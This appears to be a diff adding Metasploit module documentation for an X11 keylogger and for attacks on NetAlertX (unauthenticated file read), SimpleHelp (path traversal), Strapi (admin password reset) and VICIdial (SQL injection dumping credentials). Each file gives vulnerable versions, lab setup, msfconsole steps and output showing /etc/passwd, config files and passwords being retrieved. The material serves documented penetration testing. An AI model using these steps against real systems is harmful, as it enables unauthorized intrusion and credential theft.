+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
+[+] 127.0.0.1:6000 - All setup, watching for keystrokes
+[+] 127.0.0.1:6000 - X11 Key presses observed: te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[*] 127.0.0.1:6000 - Closing X11 connection
+[+] 127.0.0.1:6000 - Logged keys stored to: /root/.msf4/loot/20240226150211_default_127.0.0.1_x11.keylogger_839830.txt
+[-] 127.0.0.1:6000 - Stopping running against current target...
+[*] 127.0.0.1:6000 - Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
+
+## Confirming
+
+To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
+
+The output will be very similar to the metasploit module, but may differ. Compare the below two entries (spaces added to xspy for alignment):
+
+```
+xspy: the      quck         rown       foxumps      over         the       lazy      do
+msf:  te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+
+An attacker can read any file through log functionality with no authentication.
+
+The vulnerability affects:
+
+    * v24.7.18 <= NetAlertX <= v24.9.12
+
+## Verification Steps
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+### Verification
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/netalertx_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get the contents of the specified file.
+
+## Options
+
+- `RHOSTS`: target host
+- `RPORT`: target port, default 20211
+- `FILEPATH`: path to the required file
+- `DEPTH`: number of `../` to be prepended to `FILEPATH`
+
+## Scenarios
+
+```
+msf6 > use auxiliary/scanner/http/netalertx_file_read 
+msf6 auxiliary(scanner/http/netalertx_file_read) > show options
+
+Module options (auxiliary/scanner/http/netalertx_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DEPTH     5                yes       Traversal Depth (to reach the root folder)
+   FILEPATH  /etc/passwd      yes       The path to the file to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                        tml
+   RPORT     20211            yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/netalertx_file_read) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/netalertx_file_read) > run
+[*] Received data:
+[*] root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+catchlog:x:100:101:catchlog:/:/sbin/nologin
+nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
+
+[*] Stored results in netalert_result.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/netalertx_file_read) > 
+
+
+```
+
+
@@ -0,0 +1,93 @@
+## Vulnerable Application
+There exists a path traversal vulnerability in the /toolbox-resource endpoint of SimpleHelp that enables unauthenticated
+remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+
+### Setup
+
+On Ubuntu 22.04 download a vulnerable version of SimpleHelp, for this demo we will use 5.5.7:
+`wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
+
+Unzip the application:
+```
+cd /opt
+tar -xvf SimpleHelp-linux-amd64.tar.gz
+```
+
+Start the server:
+```
+cd SimpleHelp
+sudo sh serverstart.sh
+```
+
+Navigate to the Web App GUI at: `http://127.0.0.1` (by default the application should be listening on all interfaces).
+You should see "Welcome to your new SimpleHelp Server".
+Select "Start New Server". The application should now be vulnerable to the path traversal.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use simplehelp_toolbox_path_traversal`
+1. Set the `RHOST`
+1. Run the module
+1. Receive the file `serverconfig.xml` from the SimpleHelp
+
+## Scenarios
+### SimpleHelp 5.5.7 running on Ubuntu 22.04
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use simplehelp_toolbox_path_traversal
+
+Matching Modules
+================
+
+   #  Name                                                      Disclosure Date  Rank    Check  Description
+   -  ----                                                      ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/simplehelp_toolbox_path_traversal  2025-01-12       normal  No     Simple Help Path Traversal Vulnerability
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+
+[*] Using auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Reloading module...
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 5233 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250220163655_default_172.16.199.130_simplehelp.trave_035651.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### SimpleHelp 5.5.7 running on Windows 11
+```
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set filepath windows/system.ini
+filepath => windows/system.ini
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set depth 4
+depth => 4
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 219 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] exec: cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module abuses the mishandling of a password reset request for 
+Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+
+### Install
+
+
+```
+docker run -it -p 1337:1337 --rm node:16 /bin/bash
+export CXXFLAGS="-std=c++17"
+# Complete the quickstart
+npm install -g create-strapi-app@3.0.0-beta.17.4 && create-strapi-app yourProjectName
+```
+
+Navigate to http://localhost:1337/ to verify the application is running. Now create the first admin account at http://localhost:1337/admin
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/strapi_3_password_reset`
+1. Do: `set new_password testtesttest`
+1. Do: `set rport 1337`
+1. Do: `set rhosts 127.0.0.1`
+1. Do: `run`
+1. You should be able to reset the admin users password
+
+## Options
+
+### NEW_PASSWORD
+
+New Admin password. No default.
+
+## Scenarios
+
+### npx install of strapi 3.0.0-beta.17.4
+
+```
+msf6 > use auxiliary/scanner/http/strapi_3_password_reset
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set new_password testtesttest
+new_password => testtesttest
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rport 1337
+rport => 1337
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > check
+[-] This module does not support check.
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > run
+
+[*] Resetting admin password...
+[+] Password changed successfully!
+[+] User: superadminuser
+[+] Email: none@none.com
+[+] PASSWORD: testtesttest
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+This module exploits a single authenticated SQL Injection vulnerability in VICIdial, affecting version 2.14-917a.
+
+VICIdial does not encrypt passwords by default.
+
+VICIBox/VICIdial includes an auto-update mechanism, so be aware when creating vulnerable boxes.
+
+### Install
+
+#### Version 11.0.1 Setup
+
+1. **Download the ISO**:
+   [ViciBox_v11.x86_64-11.0.1-md.iso](http://download.vicidial.com/iso/vicibox/server/ViciBox_v11.x86_64-11.0.1-md.iso)
+
+2. **Create a VM**:
+   - Connect to the shell using the default credentials:
+     `root:vicidial` (Note: The keyboard layout is QWERTY by default).
+
+3. **Run the setup and reboot the VM**:
+   - After rebooting, **do not** run the command `/usr/local/bin/vicibox-install` until after the next step.
+
+4. **Vulnerable Revision Setup**:
+   - Run the following command to install a vulnerable version of VICIdial:
+```
+svn checkout -r 3830 svn://svn.eflo.net:3690/agc_2-X/trunk /usr/src/astguiclient/trunk
+```
+   - Revision 3830 is vulnerable to both SQL Injection and RCE.
+   - Note: The CVEs have been patched starting from revision 3848.
+
+5. **Legacy Installation**:
+   - Run the installation in legacy mode:
+```
+vicibox-install --legacy
+```
+
+6. **Installer Output Example**:
+```
+vicibox11:~ # vicibox-install --legacy
+
+ViciBox Installer
+
+Legacy mode activated
+Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137.
+Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138.
+Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137.
+Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138.
+
+The installer will ask questions based upon the role that this server is
+to provide for the ViciBox Call Center Suite. You should have the database
+and optionally archive servers setup prior to installing any other servers.
+The installer will not run without there being a configured database! If this
+server is to be the database then it must be installed before the archive server.
+Verify that all servers are connected to the same network and have connectivity
+to each other before continuing. This installer will be destructive to the server if it is run.
+
+Do you want to continue with the ViciBox install? [y/N] : y
+
+Do you want to enable expert installation? [y/N] : 
+
+The Internal IP address found was 192.168.1.4.
+Do you want to use this IP address for ViciDial? [Y/n] : y
+
+Will this server be used as the Database? [y/N] : y
+Do you want to use the default ViciDial DB settings? [Y/n] : y
+
+Will this server be used as a Web server? [y/N] : y
+
+Will this server be used as a Telephony server? [y/N] : y
+
+Will this server be used as an Archive server? [y/N] : y
+Archive server IP (192.168.1.4) : 
+Archive FTP User (cronarchive) : 
+Archive FTP Password (archive1234) : 
+Archive FTP Port (21) : 
+Archive FTP Directory () : 
+Archive URL (http://192.168.1.4/archive/) : 
+Use of uninitialized value $localsvn in concatenation (.) or string at /usr/local/bin/vicibox-install line 1513, <STDIN> line 14.
+
+The local SVN is build 240419-1817 version 2.14-916a from SVN 
+Do you want to use the ViciDial version listed above? [Y/n] : y
+
+Do you want to disable the built-in firewall? [y/N] : y
+
+
+---  ViciBox Install Summary  ---
+
+Expert   : No
+Legacy   : Yes
+Database : Yes
+Web      : Yes
+Telephony: Yes
+First Srv: Yes
+Have Arch: No
+Archive  : Yes
+Firewall : Disabled
+
+---  Configuration Information  ---
+-  Database  -
+Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 1609, <STDIN> line 16.
+SVN Rev  : 
+IP Addr  : 192.168.1.4
+Name     : asterisk
+User     : cron
+Password : 1234
+Cust User: custom
+Cust Pass: custom1234
+Port     : 3306
+
+
+Please verify the above information before continuing!
+Do you want to continue the installation? [y/N] : y
+
+
+Beginning installation, expect lots of output...
+
+Disabling firewall...
+Removed /etc/systemd/system/multi-user.target.wants/firewalld.service.
+Removed /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
+Use of uninitialized value $DBsvnrev in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, <STDIN> line 17.
+Use of uninitialized value $localsvn in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, <STDIN> line 17.
+Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 218, <STDIN> line 17.
+Local SVN revision matches DB revision: 
+Doing general DataBase requirements...
+Doing Master-specific MySQL setup...
+Configuring Web Server...
+Created symlink /etc/systemd/system/httpd.service → /usr/lib/systemd/system/apache2.service.
+Created symlink /etc/systemd/system/apache.service → /usr/lib/systemd/system/apache2.service.
+Created symlink /etc/systemd/system/multi-user.target.wants/apache2.service → /usr/lib/systemd/system/apache2.service.
+Configuring Telephony Server...
+Configuring Archive Server...
+Nouveau mot de passe : MOT DE PASSE INCORRECT : trop simple/systématique
+Retapez le nouveau mot de passe : passwd: password updated successfully
+Created symlink /etc/systemd/system/multi-user.target.wants/vsftpd.service → /usr/lib/systemd/system/vsftpd.service.
+Loading GMT and Phone Codes...
+
+Seeding the audio store, this may take a while...
+
+PLEASE use secure passwords inside vicidial. It prevents hackers
+and other undesirables from compromising your system and costing
+you thousands in toll fraud and long distance. A secure password
+Contains at least one capital letter and one number. A good example
+of a secure password would be NrWZDqL1Rg37uuC.
+
+Don't feed the black market, secure your systems properly!
+
+System should be installed. Please type 'reboot' to cleanly load everything.
+
+```
+
+7. **Post-Installation**:
+   - After installation, **reboot** the system.
+   - Access the web panel by navigating to the administration page and completing the initial setup.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/vicidial_sql_enum_users_pass`
+1. Do: `set RHOSTS <ip>`
+1. Do: `set RPORT <port>`
+1. Do: `set TARGETURI <path>`
+1. Do: `set COUNT <number>`
+1. Do: `set SqliDelay <number>`
+1. Do: `run`
+1. The module will exploit the SQL injection and return the extracted usernames and passwords
+
+## Options
+
+### COUNT
+
+Number of records to dump. Defaults to 1.
+
+### SqliDelay
+
+Delay in seconds for SQL Injection sleep. Defaults to 1.
+
+## Scenarios
+
+### ViciBox 11.0.1
+
+```
+msf6 auxiliary(scanner/http/vicidial_sql_enum_users_pass) > run http://192.168.1.4
+[*] Running module against 192.168.1.4
+
+[*] Checking if target is vulnerable...
+[+] Target is vulnerable to SQL injection.
+[*] {SQLi} Executing (select group_concat(HCx) from (select cast(concat_ws(';',ifnull(User,''),ifnull(Pass,'')) as binary) HCx from vicidial_users limit 1) em)
+[*] {SQLi} Encoded to (select group_concat(HCx) from (select cast(concat_ws(0x3b,ifnull(User,repeat(0x88,0)),ifnull(Pass,repeat(0x3f,0))) as binary) HCx from vicidial_users limit 1) em)
+[*] {SQLi} Time-based injection: expecting output of length 13
+[+] Dumped table contents:
+vicidial_users
+==============
+
+    User  Pass
+    ----  ----
+    6666  password
+
+[*] Auxiliary module execution completed
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .1.5
 .2.5